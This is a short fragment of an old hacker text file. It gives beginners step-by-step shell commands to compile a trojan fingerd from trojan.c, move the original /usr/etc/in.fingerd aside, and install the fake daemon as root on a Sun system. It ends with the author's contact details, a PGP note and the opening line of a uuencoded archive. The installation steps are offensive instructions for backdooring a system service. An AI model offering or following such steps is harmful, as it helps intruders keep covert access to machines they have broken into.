Well... if the hacker is a good one everything is useless.
Beginners: You must be root to install the trojan, remember to get a copy
of the original fingerd program before installing the fake
On a Sun do:
#cc -o in.fingerd trojan.c
#mv /usr/etc/in.fingerd fingerd.old
#mv in.fingerd /usr/etc
remember to check the /etc/inetd.conf
-=- + -
To get in touch with me send E-Mail to:
Internet: hit@bix.com X.25: QSD Nua (0)208057040540
Mbx: Hitman_Italy
if you want, use my PGP key
Version: 2.3a.2
ExorCrypt Amiga version:
-=) S.Encode v2.5 (=-
begin 777 Acrypt.lha